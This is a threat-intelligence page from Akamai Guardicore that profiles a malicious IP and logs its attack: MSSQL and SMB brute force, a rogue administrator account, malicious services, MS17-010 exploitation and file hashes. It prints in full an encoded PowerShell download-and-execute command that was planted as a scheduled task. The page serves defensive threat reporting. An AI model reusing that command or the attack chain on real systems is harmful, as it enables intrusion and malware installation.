Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

IP Address: 61.95.183.206Previously Malicious

IP Address: 61.95.183.206Previously Malicious

This IP address attempted an attack on a machine in our threat sensors network

Threat Information

Role

Attacker, Scanner

Services Targeted

MSSQL SMB

Tags

Execute MsSql Shell Command Download File Download and Execute User Created Successful SMB Login Known Malware Scheduled Task Creation MSSQL Brute Force SMB Brute Force SMB IDS - A Network Trojan was detected Service Creation MSSQL Service Start IDS - Attempted Administrator Privilege Gain User Added to Group IDS - Attempted User Privilege Gain File Operation By CMD SMB Share Connect MS17-010 Successful MSSQL Login Listening CMD

Associated Attack Servers

60.251.51.100 117.2.148.211 122.160.34.8

Basic Information

IP Address

61.95.183.206

Domain

-

ISP

Bharti Broadband

Country

India

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Akamai Guardicore Segmentation

2022-11-25

Last seen in Akamai Guardicore Segmentation

2023-01-26

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using MSSQL with the following credentials: sa / ******** - Authentication policy: White List (Part of a Brute Force Attempt)

MSSQL Brute Force Successful MSSQL Login

A user logged in using MSSQL with the following credentials: sa / ******** - Authentication policy: Previously Approved User (Part of a Brute Force Attempt)

MSSQL Brute Force Successful MSSQL Login

MSSQL executed 2 shell commands

Execute MsSql Shell Command

User k8h3d was created with the password *********** added to groups: Administrators and logged in using SMB

User Added to Group User Created Successful SMB Login

A user logged in using SMB with the following username: k8h3d - Authentication policy: Correct Password (Part of a Brute Force Attempt)

SMB Brute Force Successful SMB Login

A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts (Part of a Brute Force Attempt)

SMB Brute Force Successful SMB Login

c:\windows\system32\services.exe installed and started %systemroot%\ovbzmlut.exe as a service named xKFQ under service group None

Service Start Service Creation

The file C:\Windows\OVBZMLUt.exe was downloaded and executed

Download and Execute

C:\Windows\temp\svchost.exe was downloaded

Download File

c:\windows\system32\services.exe installed and started %systemroot%\jkcykftz.exe as a service named RDSE under service group None

Service Start Service Creation

The file C:\Windows\JKcYKFTZ.exe was downloaded and executed

Download and Execute

IDS detected A Network Trojan was detected : Possible ETERNALBLUE Probe MS17-010 (MSF style)

IDS - A Network Trojan was detected

IDS detected A Network Trojan was detected : Possible ETERNALBLUE Probe MS17-010 (Generic Flags)

IDS - A Network Trojan was detected

IDS detected A Network Trojan was detected : ETERNALBLUE Probe Vulnerable System Response MS17-010

IDS - A Network Trojan was detected

IDS detected Attempted Administrator Privilege Gain : Windows SMB remote code execution attempt 2 times

IDS - Attempted Administrator Privilege Gain

IDS detected Attempted User Privilege Gain : SQL sp_configure - configuration change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : sp_password - password change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : xp_cmdshell - program execution

IDS - Attempted User Privilege Gain

The command line powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Bluetool

Process netsvcs Service Group started listening on ports: 65533

Listening

The machine was exploited using the ms17-010 vulnerability

Connection was closed due to timeout

Associated Files

C:\xqcBFQSj.exe

SHA256: 02462c051aa4e27cf6359173c040a6e51f20172d4fcdfa2c11b6fb6a50107ab0

56320 bytes

C:\WINDOWS\Temp\svchost.exe

SHA256: 0491d8becd6639f95e745055e95e4aa4a787fc083c8baa227cbd43d9cd224e33

65000 bytes